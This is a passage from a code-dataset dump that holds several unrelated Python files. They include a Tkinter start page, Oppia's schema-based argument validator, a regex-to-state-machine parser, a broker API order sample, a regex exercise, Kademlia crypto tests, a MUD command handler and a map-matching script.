label = Label(text=\"This is the start page\", font=TITLE_FONT)\r\n label.pack(side=\"top\", fill=\"x\", pady=10)\r\n\r\n button1 = Button(text=\"Start Game\", command = self.startMain_Game)\r\n\r\n button2 = Button(text=\"Go to Scoreboard\")\r\n\r\n button1.pack()\r\n button2.pack()\r\n\r\n def start(self):\r\n self.setup()\r\n\r\nwindow = Toplevel\r\n\r\n# create the GUI as a Tkinter canvas inside the window\r\ng = StartPage(window)\r\n# play the game\r\ng.start()\r\n\r\nwhile g.test:\r\n window.update()\r\n\r\n\r\nexecfile(\"test.py\")\r\n\r\n\r\n\r\n\r\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"571508836","text":"# coding: utf-8\n\n# Copyright 2021 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Validates handler args against its schema by calling schema utils.\nAlso contains a list of handler class names which does not contain the schema.\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom core import schema_utils\n\nfrom typing import Any, Dict, List, Optional, Tuple, Union\n\n\n# Here Dict[str, Any] is used for arg_schema because the value field of the\n# schema is itself a dict that can further contain several nested dicts.\ndef get_schema_type(arg_schema: Dict[str, Any]) -> str:\n \"\"\"Returns the schema type for an argument.\n\n Args:\n arg_schema: dict(str, *). Schema for an argument.\n\n Returns:\n str. Returns schema type by extracting it from schema.\n \"\"\"\n return arg_schema['schema']['type']\n\n\n# Here Dict[str, Any] is used for arg_schema because the value field of the\n# schema is itself a dict that can further contain several nested dicts.\ndef get_corresponding_key_for_object(arg_schema: Dict[str, Any]) -> str:\n \"\"\"Returns the new key for an argument from its schema.\n\n Args:\n arg_schema: dict(str, *). Schema for an argument.\n\n Returns:\n str. The new argument name.\n \"\"\"\n return arg_schema['schema']['new_key_for_argument']\n\n\n# This function recursively uses the schema dictionary and handler_args, and\n# passes their values to itself as arguments, so their type is Any.\n# See: https://github.com/python/mypy/issues/731\ndef validate_arguments_against_schema(\n handler_args: Any,\n handler_args_schemas: Any,\n allowed_extra_args: bool,\n allow_string_to_bool_conversion: bool = False\n) -> Tuple[Dict[str, Any], List[str]]:\n \"\"\"Calls schema utils for normalization of object against its schema\n and collects all the errors.\n\n Args:\n handler_args: *. Object for normalization.\n handler_args_schemas: dict. Schema for args.\n allowed_extra_args: bool. Whether extra args are allowed in handler.\n allow_string_to_bool_conversion: bool. Whether to allow string to\n boolean coversion.\n\n Returns:\n *. A two tuple, where the first element represents the normalized value\n in dict format and the second element represents the lists of errors\n after validation.\n \"\"\"\n # Collect all errors and present them at once.\n errors = []\n # Dictionary to hold normalized values of arguments after validation.\n normalized_values = {}\n for arg_key, arg_schema in handler_args_schemas.items():\n if arg_key not in handler_args or handler_args[arg_key] is None:\n if 'default_value' in arg_schema:\n if arg_schema['default_value'] is None:\n # Skip validation because the argument is optional.\n continue\n\n if arg_schema['default_value'] is not None:\n handler_args[arg_key] = arg_schema['default_value']\n else:\n errors.append('Missing key in handler args: %s.' % arg_key)\n continue\n\n # Below normalization is for arguments which are expected to be boolean\n # but from API request they are received as string type.\n if (\n allow_string_to_bool_conversion and\n get_schema_type(arg_schema) == schema_utils.SCHEMA_TYPE_BOOL\n and isinstance(handler_args[arg_key], str)\n ):\n handler_args[arg_key] = (\n convert_string_to_bool(handler_args[arg_key]))\n\n try:\n normalized_value = schema_utils.normalize_against_schema(\n handler_args[arg_key], arg_schema['schema'])\n\n # Modification of argument name if new_key_for_argument\n # field is present in the schema.\n if 'new_key_for_argument' in arg_schema['schema']:\n arg_key = get_corresponding_key_for_object(arg_schema)\n normalized_values[arg_key] = normalized_value\n except Exception as e:\n errors.append(\n 'Schema validation for \\'%s\\' failed: %s' % (arg_key, e))\n\n extra_args = set(handler_args.keys()) - set(handler_args_schemas.keys())\n\n if not allowed_extra_args and extra_args:\n errors.append('Found extra args: %s.' % (list(extra_args)))\n\n return normalized_values, errors\n\n\ndef convert_string_to_bool(param: str) -> Optional[Union[bool, str]]:\n \"\"\"Converts a request param of type string into expected bool type.\n\n Args:\n param: str. The params which needs normalization.\n\n Returns:\n bool. Converts the string param into its expected bool type.\n \"\"\"\n case_insensitive_param = param.lower()\n\n if case_insensitive_param == 'true':\n return True\n elif case_insensitive_param == 'false':\n return False\n else:\n # String values other than booleans should be returned as it is, so that\n # schema validation will raise exceptions appropriately.\n return param\n","sub_path":"core/controllers/payload_validator.py","file_name":"payload_validator.py","file_ext":"py","file_size_in_byte":5516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"527357217","text":"import re\nfrom Concat import Concat\nfrom Empty import Empty\nfrom Epsilon import Epsilon\nfrom Kleene import Kleene\nfrom Negation import Negation\nfrom Or import Or\nfrom Symbol import Symbol\nfrom FSM import FSM\n\nclass EREMachine():\n\n def __init__(self, initerestring, events):\n #initial spec ERE to start from\n self.erestring = initerestring\n #all events relating to ERE\n self.events = events\n #dictionary of quick lookup terms\n self.t = r\"\\(|\\)|\\~|\\&|\\||\\*|\\+|epsilon|\\^|empty|\\w+\"\n self.initERE = self.genERE()\n self.symbolist = [Symbol.stringToRef[i] for i in self.events]\n self.fsm = FSM.getFSM(self.initERE, self.symbolist)\n self.currstate = self.initERE\n self.violated = False\n self.reported = False\n self.state_string = \"s0\"\n\n def update_state(self, symstring):\n statesymbol = Symbol.getERE(symstring)\n if statesymbol not in self.fsm.contents[self.currstate]:\n self.violated = True\n else:\n self.currstate = self.fsm.contents[self.currstate][statesymbol]\n self.set_state_string()\n #print(\"Proceeding to state \") + self.fsm.number[self.currstate]\n def reset_state(self):\n #reset current state to initial state\n self.currstate = self.initERE\n self.violated = False\n self.reported = False\n self.set_state_string()\n def set_state_string(self):\n self.state_string = self.fsm.number[self.currstate]\n\n def report_out(self):\n self.reported = True\n\n def genERE(self):\n plist = re.findall(self.t, self.erestring)\n plist = EREMachine.parse(plist)\n return EREMachine.makeERE(plist, self.events)\n\n #take list result and generate ERE recursively from inner lists\n @staticmethod\n def makeERE(erlist, symbols):\n if type(erlist) is list:\n negflag = False\n orflag = False\n catflag = False\n andflag = False\n #need some initial ERE to make sure this works correctly\n currentERE = Empty()\n for ind, obj in enumerate(erlist):\n if obj == \"*\":\n if ind == 0:\n raise SyntaxError(\"Kleene closure must be after stuff\")\n currentERE = Kleene.getERE(currentERE)\n elif obj == \"~\":\n negflag = True\n continue\n elif obj == \"|\":\n orflag = True\n continue\n elif obj == \"+\":\n catflag = True\n continue\n elif obj == \"&\":\n andflag = True\n continue\n else:\n if ind == 0|negflag:\n currentERE = EREMachine.makeERE(obj, symbols)\n elif orflag:\n currentERE = Or.getERE([currentERE, EREMachine.makeERE(obj,symbols)])\n orflag = False\n elif catflag:\n currentERE = Concat.getERE(currentERE, EREMachine.makeERE(obj, symbols))\n catflag = False\n elif andflag:\n currentERE = Negation.getERE(Concat.getERE(Negation.getERE(currentERE),Negation.getERE(EREMachine.makeERE(obj, symbols))))\n andflag = False\n else:\n currentERE = Concat.getERE(currentERE,EREMachine.makeERE(obj, symbols))\n if negflag:\n currentERE = Negation.getERE(currentERE)\n negflag = False\n return currentERE\n\n else:\n if erlist == 'empty':\n return Empty.getERE()\n elif erlist == 'epsilon':\n return Epsilon.getERE()\n elif erlist in symbols:\n return Symbol.getERE(erlist)\n elif not erlist:\n return\n else:\n raise ValueError('Either you have used a symbol not tied to event, or epsilon/empty is misspelled')\n #recursively parse out parenthesis. Combine with function above to save computation, but doesn't probably matter much for initial time difference\n @staticmethod\n def parse(expr):\n def _helper(iter):\n items = []\n for item in iter:\n if item == '(':\n result, closeparen = _helper(iter)\n if not closeparen:\n raise ValueError(\"bad expression -- unbalanced parentheses\")\n items.append(result)\n elif item == ')':\n return items, True\n else:\n items.append(item)\n return items, False\n\n return _helper(iter(expr))[0]\n\n","sub_path":"EREMachine/EREParser.py","file_name":"EREParser.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544159196","text":"import urllib.request\r\nimport json\r\nimport pprint\r\n\r\nobj = { 'Password': '123456',\r\n 'Symbol': '8001',\r\n 'Exchange': 1,\r\n 'SecurityType': 1,\r\n 'FrontOrderType': 10,\r\n 'TimeInForce': 0,\r\n 'Side': '2',\r\n 'CashMargin': 1,\r\n 'MarginTradeType': 1,\r\n 'DelivType': 2,\r\n 'FundType': 'AA',\r\n 'AccountType': 2,\r\n 'Qty': 100,\r\n 'ClosePositionOrder': 1,\r\n 'ClosePositions': None,\r\n 'Price': 0,\r\n 'ExpireDay': 20200717 }\r\njson_data = json.dumps(obj).encode('utf-8')\r\n\r\nurl = 'http://localhost:18080/kabusapi/sendorder'\r\nreq = urllib.request.Request(url, json_data, method='POST')\r\nreq.add_header('Content-Type', 'application/json')\r\nreq.add_header('X-API-KEY', 'e629f7e6073b40488d0d134dae4e60ac')\r\n\r\ntry:\r\n with urllib.request.urlopen(req) as res:\r\n print(res.status, res.reason)\r\n for header in res.getheaders():\r\n print(header)\r\n print()\r\n content = json.loads(res.read())\r\n pprint.pprint(content)\r\nexcept urllib.error.HTTPError as e:\r\n print(e)\r\n content = json.loads(e.read())\r\n pprint.pprint(content)\r\nexcept Exception as e:\r\n print(e)\r\n","sub_path":"sample/Python/kabusapi_sendorder.py","file_name":"kabusapi_sendorder.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"453331179","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Auteur(s) : Dylan DE MIRANDA (dylandemiranda@gmail.com) & Alexy DA CRUZ (adacruz@geomtech.fr)\n# Version : 0.2\n# Date : 28/04/2021\n# Thème du script : Exo 2\n\nimport argparse\nimport re\n\n\ndef au_revoir():\n \"\"\"\n affiche 3 sauts de ligne et Fin du programme\n Entrées : aucune\n Sortie : aucune\n \"\"\"\n print(\"\\n\\n\\nAu revoir\\n\\nFin du programme\")\n\n\ndef afficheTitre(titre: str, titreRapport: bool = False):\n \"\"\"\n génère un titre pour chaque étape ou pour le rapport avec une ligne d'étoiles\n avant et après de la longueur du titre\n Entrées : \n titre : titre de l'étape ou du rapport\n titreRapport : par défaut sur false, true si il s'agit du titre principal pour le rapport\n Sorties : \n retourne une chaine de caractère avec le titre et les étoiles ainsi\n qu'un saut de ligne si il s'agit du titre du rapport\n \"\"\"\n # Récupère la longueur du titre (nombre de caractères)\n longueurTitre = len(titre)\n # Génère un string contenant le bon nombre d'étoiles\n etoiles = \"*\"*longueurTitre\n # Génère le string contenant le titre et les étoiles\n renduTitre = etoiles + \"\\n\" + titre + \"\\n\" + etoiles + \"\\n\"\n\n # Retourne le string généré\n return renduTitre\n\n\ndef afficheLignes(regex: str, lignes: list):\n \"\"\"\n génère une liste des lignes trouvées par rapport aux regex appliqués\n Entrées :\n regex : filtre regex à appliquer sur la ligne\n Sorties :\n retourne une liste contenant les lignes trouvées par rapport aux regex appliqués \n \"\"\"\n renduLignes = \"\"\n lignesTrouvees = []\n\n # Pour chaque ligne du fichier\n for ligne in lignes:\n # On test le regex sur la ligne\n if re.search(regex, ligne):\n # Si ça match dans la ligne, on l'ajoute à la liste des lignes trouvées\n lignesTrouvees.append(ligne)\n\n # pour chaque ligne trouvée\n for ligne in lignesTrouvees:\n # On les ajoutes à la suite dans une chaine de caractères\n renduLignes = renduLignes + ligne\n\n # On ajoute ensuite le compte de lignes trouvées pour l'étape dans le rapport\n renduLignes = renduLignes + \"*\"*5 + \" \" + str(len(lignesTrouvees)) + \" lignes trouvees \" + \"*\"*5 + \"\\n\\n\"\n\n # On retourne la liste contenant les lignées trouvées\n return renduLignes\n\ndef GenererFichier(nomFichier, sortieFichier):\n \"\"\"\n prend le fichier de base et applique des filtres regex\n sur chaque ligne et sort un fichier de sortie en tant\n que rapport sur les filtres regex appliqués\n Entrées :\n nomFichier : nom du fichier de base dans lequel appliquer les filtres regex\n sortieFichier : fichier dans lequel écrire le rapport\n Sorties : aucune\n \"\"\"\n\n # Liste contenant les regex à appliquer sur chaque ligne\n regexList = [\n r'[A-Z0-9]', # 1.a: lignes contenant des chiffres ou des majuscules\n r'\\.', # 1.b: lignes contenant des points\n r'\\.\\.\\.', # 1.c: lignes contenant trois points\n r'(\\s|)([0-9A-Fa-f])+(\\s)', # 1.d: lignes contenant des nombres hexadecimaux separes par des blancs\n r'(\\s)*(([0-9A-Z])|([0-9a-z])){12,}(\\s)*', # 1.e: lignes contenant un mot d'au moins 12 caracteres alphanumeriques\n r'^(([^a]*?)(a)([^a]*?)){5}$', # 1.f: lignes contenant exactement 5 lettres a(pas nécessairement successives)\n r'[\\[|\\]]', # 1.g: lignes contenant des crochets(] ou[)\n r'^((a+)|( ))', # 1.h: lignes ne contenant que des lettres a et des espaces\n r'(([0-9]+)(\\.)([0-9]+)(\\.)([0-9]+)(\\.)([0-9]+))', # 1.i: lignes contenant quelque chose qui ressemble a une adresse IP\n r'^\\n$', # 2.a: lignes vides\n r'^(\\s)+\\n$', # 2.b: lignes blanches\n r'.', # 2.c: lignes non vides\n r'^((?!a).)*$', # 3.a: lignes qui ne contiennent pas de a\n r'^((?! ).)*$', # 3.b: lignes qui ne contiennent pas des espaces\n r'^((?![0-9]+).)*$', # 3.c: lignes qui ne contiennent pas des chiffres décimaux\n r'^(([0-9]{2})(\\ )([0-9]{2})(\\ )([0-9]{2})(\\ )([0-9]{2})(\\ )([0-9]{2}))', # 4: lignes qui débutent par un numéro de téléphone au format 01 23 45 67 89\n r'^(([0-9]{2})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2}))', # 5: idem 4 mais on peut avoir . ou - a la place des espaces\n r'^(([0]|\\(0\\))([0-9]{1})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2}))', # 6: idem 5 mais le 0 peut être entoure de parentheses\n r'(([0]|\\(0\\))(\\ |\\-|\\.)([0-9]{3})(\\ |\\-|\\.)([0-9]{3})(\\ |\\-|\\.)([0-9]{3}))$' # 7: terminent par un tel au format 0 123 456 789, espaces, - ou . et(0\n ]\n\n # Liste des titres de chaque étape du rapport\n titreList = [\n \"1.a: lignes contenant des chiffres ou des majuscules\",\n \"1.b: lignes contenant des points\",\n \"1.c: lignes contenant trois points\",\n \"1.d: lignes contenant des nombres hexadecimaux separes par des blancs\",\n \"1.e: lignes contenant un mot d'au moins 12 caracteres alphanumeriques\",\n \"1.f: lignes contenant exactement 5 lettres a(pas nécessairement successives)\",\n \"1.g: lignes contenant des crochets(] ou[)\",\n \"1.h: lignes ne contenant que des lettres a et des espaces\",\n \"1.i: lignes contenant quelque chose qui ressemble a une adresse IP\",\n \"2.a: lignes vides\",\n \"2.b: lignes blanches\",\n \"2.c: lignes non vides\",\n \"3.a: lignes qui ne contiennent pas de a\",\n \"3.b: lignes qui ne contiennent pas des espaces\",\n \"3.c: lignes qui ne contiennent pas des chiffres décimaux\",\n \"4: lignes qui débutent par un numéro de téléphone au format 01 23 45 67 89\",\n \"5: idem 4 mais on peut avoir . ou - a la place des espaces\",\n \"6: idem 5 mais le 0 peut être entoure de parentheses\",\n \"7: terminent par un tel au format 0 123 456 789, espaces, - ou . et(0)\"\n ]\n\n # Titre du rapport\n sortieFichier.write(afficheTitre(\"PYTHON : Fichier de sortie de l'exercice 2 du TP4\"))\n\n # Pour chaque regex qui se trouve dans la liste\n for i in range(0, len(regexList)):\n # On ouvre le fichier de base en lecture\n entreFichier = open(nomFichier, 'r')\n # On écrit dans le fichier de sortie le titre de l'étape du rapport\n sortieFichier.write(afficheTitre(titreList[i]))\n # On écrit dans le fichier de sortie le rendu appliqué après le filtre regex\n sortieFichier.write(afficheLignes(regexList[i], entreFichier))\n # On ferme le fichier\n entreFichier.close()\n\n\n################################################\n########## PROGRAMME PRINCIPAL ################\n################################################\n\ndef main():\n # Parsing des arguments lancé dans le CLI\n parser = argparse.ArgumentParser()\n\n # Argument pour le nom du fichier à parser\n parser.add_argument(\"filename\", help=\"Nom du fichier à parser.\", type=str)\n parser.add_argument(\"output\", help=\"Nom du fichier de sortie pour les résultats de parsing.\", type=str)\n\n args = parser.parse_args()\n\n # Assignation de la valeur de l'argument filename\n filename = args.filename\n output = args.output\n\n # Ouvre le fichier de sortie en écriture\n outputFichier = open(output, 'w')\n # Appel de la fonction GenererFichier en renseignant le nom du fichier de base et en mettant l'objet file pour le fichier de sortie\n GenererFichier(filename, outputFichier)\n # Fermeture du fichier de sortie\n outputFichier.close()\n\n\nif __name__ == \"__main__\":\n main() # Appel de notre fonction principale\n au_revoir() # Appel de notre fonction pour quitter le programme\n","sub_path":"Leçon 8/TP8_Exo2_v2.py","file_name":"TP8_Exo2_v2.py","file_ext":"py","file_size_in_byte":7726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"448029853","text":"import unittest\n\nfrom kademlia.crypto import Crypto\nfrom kademlia.domain.domain import PublicKey, PersistMode\nfrom kademlia.utils import digest\n\n\nclass CryptoTests(unittest.TestCase):\n\n def setUp(self):\n self.crypto = Crypto()\n\n def test_get_signature(self):\n \"\"\"\n get_signature should return signature for specified value and private key\n \"\"\"\n priv_key = 'b22c8ea30609663197550b010e7abf5a9726523e8ca7ffdfb6a102815d3c8e97'\n tgs_sign = 'd83c0713135d774afda7df23e8c45d4456f0e7cfbea92824b8980d2d6934b16f5e7b665e95cfd7d7ec2eddcd9c5ca7e2c0e257df01817033bc0f2aab2ce7bab2'\n value_1 = b'test value'\n\n signature_1 = self.crypto.get_signature(value_1, priv_key).hex()\n self.assertEqual(signature_1, tgs_sign)\n\n def test_check_signature(self):\n \"\"\"\n check_signature should validate signature\n \"\"\"\n public_key = '0224d2079e86e937224f08aa37a857ca6116546868edde549d0bd6b8536af9d554'\n tcs_sig = '749625f8d70efae75ffd4a62e22c6534b2cbaa49212c454e6cfb7c5215e39ef01d0388999b2d38a24ad379245e1b4c69b9259b1c8c86bb011712999b4565192d'\n value = digest('some_key').hex() + 'some_data' + str(None) + str(PersistMode.SECURED)\n\n self.assertTrue(self.crypto.check_signature(digest(value), tcs_sig, public_key))\n\n\nclass PublicKeyTests(unittest.TestCase):\n\n def test__init__(self):\n \"\"\"\n __init__ should set initial values for key and exp_time\n \"\"\"\n public_key = PublicKey('test key')\n self.assertEqual(public_key.key, 'test key')\n self.assertIsNone(public_key.exp_time)\n public_key = PublicKey('test key', 123)\n self.assertEqual(public_key.exp_time, 123)\n\n def test_createKey_validFormat_ok(self):\n \"\"\"\n key.set should check type and set key\n \"\"\"\n public_key = PublicKey('test key')\n public_key.key = 'another key'\n self.assertEqual(public_key.key, 'another key')\n\n def test_createKey_invalidFormat_errorRaises(self):\n \"\"\"\n key.set should check type and raise exception in case of invalid format\n \"\"\"\n\n self.assertRaises(AssertionError, lambda: PublicKey(None))\n self.assertRaises(AssertionError, lambda: PublicKey(123))\n\n def test_of_json(self):\n \"\"\"\n of_json should set key and exp_time from json\n \"\"\"\n json = dict()\n json2 = dict()\n json['key'] = 'test key'\n json['exp_time'] = 123\n public_key = PublicKey.of_json(json)\n self.assertEqual(public_key.key, 'test key')\n self.assertEqual(public_key.exp_time, 123)\n self.assertRaises(AssertionError, lambda: PublicKey.of_json(json2))","sub_path":"kademlia/tests/test_crypto.py","file_name":"test_crypto.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"343644122","text":"def insert_sort(array):\n for i in range(0, len(array)):\n k = array[i]\n j = i\n while j > 0 and array[j-1] > k:\n array[j] = array[j-1]\n j -= 1\n array[j] = k\n return array\n\nimport random\nl = [5, 5, 0, 6, 4, 6, 1, 6, 7, 4]\nprint(insert_sort(l))\nprint(insert_sort([random.randint(0, 10) for i in range(10)]))\n","sub_path":"Algorithms/InsertSort.py","file_name":"InsertSort.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"432263836","text":"import sys\n\nlst = []\nfor line in sys.stdin:\n if line.strip()=='':\n break\n lst.append(line)\n\nnumber = int(lst[0])\n\ncount = 0\nbegin = 1\nwhile count < number:\n lineNumber = int(lst[begin])\n if lineNumber < 3:\n print(0)\n begin += 2\n count += 1\n continue\n length = []\n i = 0\n while i < len(lst[begin+1]):\n str = ''\n if lst[begin+1][i]>='0' and lst[begin+1][i]<='9':\n str += lst[begin+1][i]\n if i==len(lst[begin+1])-1:\n length.append(int(str))\n break\n while lst[begin+1][i+1]>='0' and lst[begin+1][i+1]<='9':\n str += lst[begin+1][i+1]\n i += 1\n if i == len(lst[begin + 1]) - 1:\n break\n length.append(int(str))\n i += 1\n\n triangles = 0\n for i in range(0,lineNumber-2):\n for j in range(i+1,lineNumber-1):\n for h in range(j+1,lineNumber):\n judge = True\n if (length[i]+length[j] 0.8)]\n\nsvp_labels = (X[:, 0] > 0.5).astype(int)\nCNN_pred = (np.argmax(X[:, 1:], axis=1) > 0).astype(int)\n\nprint(len(svp_labels))\nprint(\"accuracy: \", accuracy_score(svp_labels, CNN_pred))\nprint(\"precision: \", precision_score(svp_labels, CNN_pred))\nprint(\"recall: \", recall_score(svp_labels, CNN_pred))\nprint(\"f1: \", f1_score(svp_labels, CNN_pred))\n\n","sub_path":"evaluation/svplaudit_agreement.py","file_name":"svplaudit_agreement.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"89174398","text":"from functions import addToScheduler\nfrom functions import getFreeKey\nfrom copy import deepcopy\nimport time\n\n'''\nCommand function template:\n\ndef atcommandname(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tprint(\"I'm in!\")\n'''\ndef sendAtCommandError(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tmud.send_message(id, \"Unknown @command \" + str(params) + \"!\")\n\ndef quit(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tmud._handle_disconnect(id)\n\ndef who(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tcounter = 1\n\tif players[id]['permissionLevel'] == 0:\n\t\tfor p in players:\n\t\t\tif players[p]['name'] == None:\n\t\t\t\tname = \"None\"\n\t\t\telse:\n\t\t\t\tname = players[p]['name']\n\t\t\t\t\n\t\t\tif players[p]['room'] == None:\n\t\t\t\troom = \"None\"\n\t\t\telse:\n\t\t\t\troom = players[p]['room']\n\n\t\t\tmud.send_message(id, str(counter) + \". Client ID: [\" + str(p) + \"] Player name: [\" + name + \"] Room: [\" + room + \"]\")\n\t\t\tcounter += 1\n\telse:\n\t\tmud.send_message(id, \"You do not have permission to do this.\")\n\ndef subscribe(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\t# print(\"Subbing to a channel\")\n\tparams = params.replace(\" \", \"\")\n\tif len(params) > 0:\n\t\tif str(params.lower()) in players[id]['channels']:\n\t\t\tmud.send_message(id, \"You are already subscribed to [\" + params.lower() + \"]\")\n\t\telse:\n\t\t\tplayers[id]['channels'].append(str(params.lower()))\n\t\t\tmud.send_message(id, \"You have subscribed to [\" + params + \"]\")\n\telse:\n\t\tmud.send_message(id, \"What channel would you like to subscribe to?\")\n\ndef unsubscribe(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\t# print(\"Un-Subbing from a channel\")\n\tparams = params.replace(\" \", \"\")\n\tif len(params) > 0:\n\t\ttry:\n\t\t\tplayers[id]['channels'].remove(params.lower())\n\t\t\tmud.send_message(id, \"You have unsubscribed from [\" + params.lower() + \"]\")\n\t\texcept Exception as e:\n\t\t\tmud.send_message(id, \"You are not currently subscribed to [\" + params.lower() + \"]\")\n\telse:\n\t\tmud.send_message(id, \"What channel would you like to unsubscribe from?\")\n\t\n\tif params.lower() == \"system\":\n\t\tmud.send_message(id, \"You have un-subscribed from a SYSTEM channel. From now on, you will not receive any game-wide system messages (including server reboot notifications etc.). You can subscribe to SYSTEM at any time by typing '@subscribe system'\")\n\ndef channels(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tif len(players[id]['channels']):\n\t\tmud.send_message(id, \"You are currently subscribed to the following channels:\")\n\t\t# print(players[id]['channels'])\n\t\tfor c in players[id]['channels']:\n\t\t\tmud.send_message(id, \"[\" + c + \"]\")\n\telse:\n\t\tmud.send_message(id, \"You are not currently subscribed to any channels.\")\n\ndef runAtCommand(command, params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tswitcher = {\n\t\t\"sendAtCommandError\": sendAtCommandError,\n\t\t\"quit\": quit,\n\t\t\"subscribe\": subscribe,\n\t\t\"unsubscribe\": unsubscribe,\n\t\t\"channels\": channels,\n\t\t\"who\": who,\n\t}\n\n\ttry:\n\t\tswitcher[command](params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses)\n\texcept Exception as e:\n\t\tswitcher[\"sendAtCommandError\"](e, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses)\n","sub_path":"atcommands.py","file_name":"atcommands.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"58570495","text":"\"\"\"\n@author: Milena Bajic (DTU Compute)\n\"\"\"\n\nimport sys, os, argparse\nimport pandas as pd\nfrom utils.data_loaders import *\nfrom utils.plotting import *\nfrom utils.matching import *\nimport json\n\n#=================================#\n# SETTINGS\n#=================================#\n# Script arguments\nparser = argparse.ArgumentParser(description='Please provide command line arguments.')\n\nparser.add_argument('--route', default= \"CPH1_VH\", help='Process all trips on this route, given in json file.')\nparser.add_argument('--trips', nargs='+', type=int, help='Process those trips. If not passed, the trips in the json file for the selected route will be processed.')\nparser.add_argument('--p79', action='store_true', help = 'If this is p79 data, pass true.')\nparser.add_argument('--aran', action='store_true', help = 'If this is aran data, pass true.')\nparser.add_argument('--json', default= \"json/routes.json\", help='Json file with route information.')\nparser.add_argument('--out_dir', default= \"data\", help='Output directory.')\nparser.add_argument('--recreate', action='store_true', help = 'Recreate files, even if present. If False and files are present, the data will be loaded from them.') \n\n# Parse arguments\nargs = parser.parse_args()\nroute = args.route\ntrips = args.trips\nis_p79 = args.p79\nis_aran = args.aran\njson_file = args.json\nout_dir = args.out_dir\nrecreate = args.recreate\n#=================================\n# P79 or ARAN?\nif not is_p79 and not is_aran:\n print('No data type set. Choose p79 or aran.')\n sys.exit(0)\n \nif is_p79 and is_aran:\n print('Choose either p79 or aran, not both at the same time.')\n sys.exit(0)\n \n# Create output directory for this route\nif is_p79:\n out_dir_route = '{0}/P79_processesed_data/{1}'.format(out_dir, route)\nelif is_aran:\n out_dir_route = '{0}/ARAN_processesed_data/{1}'.format(out_dir, route)\nif not os.path.exists(out_dir_route):\n os.makedirs(out_dir_route)\n\n# Create putput directory for route plots\nout_dir_plots = '{0}/plots'.format(out_dir_route)\nif not os.path.exists(out_dir_plots):\n os.makedirs(out_dir_plots)\n \n \n # Use all selected trips or the ones in json file \nif trips: \n trips_thisroute = trips\nelse:\n # Load json file\n with open(json_file, \"r\") as f:\n route_data = json.load(f)\n if is_p79:\n trips_thisroute = route_data[route]['P79_trips']\n elif is_aran:\n trips_thisroute = route_data[route]['ARAN_trips'] \n \n \nif not trips_thisroute:\n print('No trips set.')\n sys.exit(0)\n \n# Process trips\nfor trip in trips_thisroute:\n \n # Load data\n DRD_data, iri, DRD_trips = load_DRD_data(trip, is_p79 = is_p79, is_ARAN = is_aran) \n \n # Map match \n file_suff = 'P79_route-{0}_taskid-{1}_full'.format(route, trip)\n full_filename = '{0}/map_matched_data{1}.pickle'.format(out_dir_route, file_suff)\n print(full_filename)\n \n if os.path.exists(full_filename):\n map_matched_data = pd.read_pickle(full_filename)\n \n else:\n if is_aran:\n DRD_data.dropna(subset=['lat','lon'], inplace=True) \n map_matched_data = map_match_gps_data(gps_data = DRD_data, is_GM = False, out_dir = out_dir_route , out_file_suff = file_suff, recreate = recreate)\n else:\n map_matched_data = map_match_gps_data(gps_data = iri, is_GM = False, out_dir = out_dir_route , out_file_suff = file_suff, recreate = recreate)\n \n plot_geolocation(map_matched_data['lon_map'], map_matched_data['lat_map'], name = 'DRD_{0}_GPS_mapmatched_gpspoints'.format(trip), out_dir = out_dir_plots, plot_firstlast = 1000, recreate = 